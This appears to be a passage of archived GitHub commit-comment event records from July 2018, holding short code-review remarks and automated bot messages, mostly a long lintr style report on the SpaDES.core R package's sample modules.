{"id":"7925355843","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29613120,"position":14,"line":52,"path":"Dodo.RestaurantBoard.Tests/CallCenterTests.cs","commit_id":"762f7bba22f72419a56616c3a8a7c4a5bdab6426","created_at":"2018-07-05T20:19:24Z","updated_at":"2018-07-05T20:19:24Z","author_association":"MEMBER","body":"Враньё, в Arrange нет никакого SitePath"}},"created_at":"2018-07-05T20:19:24Z"}
{"id":"7925358820","type":"CommitCommentEvent","actor":{"login":"jadamcrain"},"repo":{"name":"automatak/dnp3"},"payload":{"comment":{"id":29613127,"position":40,"line":65,"path":"cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h","commit_id":"c21a51b174a297be0d6d2bfb17243df1ed628307","created_at":"2018-07-05T20:20:06Z","updated_at":"2018-07-05T20:20:06Z","author_association":"MEMBER","body":"Thanks for the update. I always hate having to do workarounds for non-conformant compilers, so if you can switch versions I'd be happier just keeping the code the way it is."}},"created_at":"2018-07-05T20:20:06Z"}
{"id":"7925359859","type":"CommitCommentEvent","actor":{"login":"Alexander-Miller"},"repo":{"name":"Alexander-Miller/pfuture"},"payload":{"comment":{"id":29613130,"position":null,"line":null,"path":null,"commit_id":"ec06210b7ddf7a69275879a08b26c1cc7189a03a","created_at":"2018-07-05T20:20:20Z","updated_at":"2018-07-05T20:20:20Z","author_association":"OWNER","body":"Sorry for the late reply, the whole thing slipped my mind and I got busy with treemacs again.\r\n\r\nThere is no buffer involved in this version. The process output is passed to the filter function and that's that. To associate the process with a buffer you need to explicitly pass something to the `:buffer` argument of `make-process`. I don't know whether such an option is worth it, running some performance tests for this is still on my todo list."}},"created_at":"2018-07-05T20:20:20Z"}
{"id":"7925360895","type":"CommitCommentEvent","actor":{"login":"simontretter"},"repo":{"name":"simontretter/packages"},"payload":{"comment":{"id":29613131,"position":null,"line":null,"path":null,"commit_id":"d8899e77f75e4e6025ff01a030b9217caa3a75c2","created_at":"2018-07-05T20:20:34Z","updated_at":"2018-07-05T20:20:34Z","author_association":"OWNER","body":"Configure fails to detect IPv6 support on musl systems. As a result, the standard package lacks ipv6 support (rsync --version shows no-IPV6). This commit applies [Alpine Linux's fix](https://git.alpinelinux.org/cgit/aports/commit/?id=2883d8bada0d04fb59f363e8a3c9a581f978aab3) by forcing IPV6 support on. \r\n\r\nThis is only done when the global IPV6 flag is enabled, otherwise support will be disabled explicitly by the standard rsync configure flag.\r\n\r\nSigned-off-by: Simon Tretter simon@mediaarchitectu.re"}},"created_at":"2018-07-05T20:20:34Z"}
{"id":"7925360927","type":"CommitCommentEvent","actor":{"login":"Alexander-Miller"},"repo":{"name":"Alexander-Miller/pfuture"},"payload":{"comment":{"id":29613133,"position":47,"line":93,"path":"pfuture.el","commit_id":"ec06210b7ddf7a69275879a08b26c1cc7189a03a","created_at":"2018-07-05T20:20:35Z","updated_at":"2018-07-05T20:20:35Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-05T20:20:35Z"}
{"id":"7925361514","type":"CommitCommentEvent","actor":{"login":"Alexander-Miller"},"repo":{"name":"Alexander-Miller/pfuture"},"payload":{"comment":{"id":29613135,"position":43,"line":89,"path":"pfuture.el","commit_id":"ec06210b7ddf7a69275879a08b26c1cc7189a03a","created_at":"2018-07-05T20:20:42Z","updated_at":"2018-07-05T20:20:42Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-05T20:20:42Z"}
{"id":"7925363918","type":"CommitCommentEvent","actor":{"login":"nomorephones"},"repo":{"name":"nomorephones/OfficeDocs-SkypeForBusiness"},"payload":{"comment":{"id":29613141,"position":null,"line":null,"path":null,"commit_id":"d51fe797f9fa2f65a0b2917e31f7b61487037804","created_at":"2018-07-05T20:21:15Z","updated_at":"2018-07-05T20:21:15Z","author_association":"OWNER","body":"Making edits for this page.  @tonysmith "}},"created_at":"2018-07-05T20:21:15Z"}
{"id":"7925366695","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29613145,"position":null,"line":null,"path":null,"commit_id":"4525e87e8d1e5114664fce3439bc020a959630ab","created_at":"2018-07-05T20:21:52Z","updated_at":"2018-07-05T20:21:52Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-103](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-103).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-103-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-05T20:21:52Z"}
{"id":"7925368603","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29613151,"position":null,"line":null,"path":null,"commit_id":"de258ed94866de545c0d297e2d839a2936de21e6","created_at":"2018-07-05T20:22:20Z","updated_at":"2018-07-05T20:22:20Z","author_association":"CONTRIBUTOR","body":"The `augment()` function:\r\n\r\ncan you please change this to:\r\n\r\nThe `augment()` function in the `broom` package\r\n\r\nthroughout"}},"created_at":"2018-07-05T20:22:20Z"}
{"id":"7925370935","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29613157,"position":58,"line":58,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T20:22:54Z","updated_at":"2018-07-05T20:22:54Z","author_association":"MEMBER","body":"so i tested and it looks like the issue the drop effect has is caused by something else, maybe because it takes in %itemtypes/experience%. I swapped this to item type."}},"created_at":"2018-07-05T20:22:54Z"}
{"id":"7925371631","type":"CommitCommentEvent","actor":{"login":"ryanwalls"},"repo":{"name":"3DSIM/simulation-api-specification"},"payload":{"comment":{"id":29613160,"position":null,"line":null,"path":null,"commit_id":"56384a9a5fc1403f554cb53cd002c555924bd3ce","created_at":"2018-07-05T20:23:04Z","updated_at":"2018-07-05T20:23:04Z","author_association":"CONTRIBUTOR","body":"__[API Description file `simulationapi`](https://app.apiary.io/simulationapi/editor) has not been updated in Apiary.io__ due to server timeout.\nPlease try it later by trying to redeliver the associated [web hook in settings](api.github.com/3DSIM/simulation-api-specification/settings/hooks) of this repository. (Autogenerated message from apiary.io)"}},"created_at":"2018-07-05T20:23:04Z"}
{"id":"7925373055","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29613162,"position":null,"line":null,"path":null,"commit_id":"16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8","created_at":"2018-07-05T20:23:21Z","updated_at":"2018-07-05T20:23:21Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) 